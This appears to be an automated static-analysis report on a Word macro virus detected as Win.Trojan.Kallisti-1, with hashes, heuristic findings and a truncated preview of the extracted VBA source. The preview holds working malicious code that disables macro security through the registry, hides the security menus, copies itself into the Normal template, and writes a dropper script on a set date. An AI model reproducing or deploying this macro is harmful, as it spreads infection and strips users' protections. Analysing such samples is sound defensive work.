Win.Trojan.Kallisti-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 841ad0ebc113c60c…

MALICIOUS

Office (OLE)

112.5 KB Created: 2003-07-16 00:07:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: da0bd60206ae8074cb3c00a7b276c7db SHA-1: f2b90ca7a46a09f56d5fab6a0a647757aef53ad2 SHA-256: 841ad0ebc113c60cab21d497338bf4752803a2851653605ab794de606ddaf418
248 Risk Score

Malware Insights

Win.Trojan.Kallisti-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with a Document_Open subroutine that attempts to lower macro security settings by writing to the registry. It then uses the Shell() function to execute a payload, indicating a downloader or trojan. The ClamAV detection name 'Win.Trojan.Kallisti-1' further supports this assessment.

Heuristics 7

  • ClamAV: Win.Trojan.Kallisti-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Kallisti-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44839 bytes
SHA-256: 72550590b078c65da35642f06f4e297da08efba719c2ec4681a0c23f82dc542b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub document_open()
Pervone = VBA.Int(99) - VBA.Fix(98)
Pervnul = VBA.Fix(99) - VBA.Int(99)
If Application.Version = "8.0" Then
With Options
.VirusProtection = Pervnul
End With
End If

If Application.Version = "9.0" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Visible = Pervnul
CommandBars("Macro").Controls("Visual Basic Editor").Visible = Pervnul
CommandBars("Macro").Controls("Macros...").Visible = Pervnul
End If

If Application.Version = "10.0" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
WordBasic.FileExit dlg
End If
CommandBars("Macro").Controls("Security...").Visible = Pervnul
CommandBars("Macro").Controls("Visual Basic Editor").Visible = Pervnul
CommandBars("Macro").Controls("Macros...").Visible = Pervnul
End If

With Options
.ConfirmConversions = Pervnul
End With
With Application
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabled
End With

FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable

CommandBars("Tools").Controls("Templates and Add-Ins...").Visible = Pervnul
CommandBars("Tools").Controls("Customize...").Visible = Pervnul

ourcode = MacroContainer.VBProject.VBComponents(Pervone).CodeModule.lines(Pervone, 1000)
If MacroContainer = NormalTemplate Then Set Target = ActiveDocument
If MacroContainer = ActiveDocument Then Set Target = NormalTemplate
If Target.Saved = Pervone Then
If VBA.GetAttr(Target.FullName) <> Pervnul Then
VBA.SetAttr Target.FullName, Pervnul
End If
End If
ü = 1

With Target.VBProject.VBComponents(Pervone)
.CodeModule.DeleteLines Pervone, .CodeModule.CountOfLines
.CodeModule.InsertLines Pervone, ourcode
End With

If Day(Now()) = (Pervone * 15) Then
Open Environ("Windir") & "\PVRT.INI" For Output As #1
Print #1, "N PVRT.JPG"
Print #1, "E 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 02 02 00 00"
Print #1, "E 0110 00 00 00 00 FF FE 00 1E 41 43 44 20 53 79 73 74"
Print #1, "E 0120 65 6D 73 20 44 69 67 69 74 61 6C 20 49 6D 61 67"
Print #1, "E 0130 69 6E 67 00 FF C0 00 11 08 01 00 01 80 03 01 22"
Print #1, "E 0140 00 02 11 01 03 11 01 FF DB 00 84 00 14 0D 0F 11"
Print #1, "E 0150 0F 0C 14 11 10 11 16 15 14 17 1E 32 20 1E 1B 1B"
Print #1, "E 0160 1E 3D 2B 2E 24 32 48 3F 4C 4B 47 3F 46 44 50 5A"
Print #1, "E 0170 73 61 50 55 6C 56 44 46 64 88 65 6C 76 7A 80 82"
Print #1, "E 0180 80 4D 60 8D 97 8C 7D 96 73 7E 80 7B 01 1F 21 21"
Print #1, "E 0190 2D 27 2D 58 30 30 58 B9 7B 69 7B B9 B9 B9 B9 B9"
Print #1, "E 01A0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9"
Print #1, "E 01B0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9"
Print #1, "E 01C0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 FF C4 00"
Print #1, "E 01D0 83 00 00 03 01 01 01 01 01 00 00 00 00 00 00 00"
Print #1, "E 01E0 00 00 02 03 04 01 05 00 06 07 10 00 02 02 01 03"
Print #1, "E 01F0 03 02 04 04 04 05 03 05 01 01 00 01 02 00 11 03"
Print #1, "E 0200 04 12 21 31 41 51 13 61 05 22 71 81 32 42 91 A1"
Print #1, "E 0210 14 52 C1 F0 23 72 B1 D1 E1 33 62 92 15 34 43 82"
Print #1, "E 0220 
... (truncated)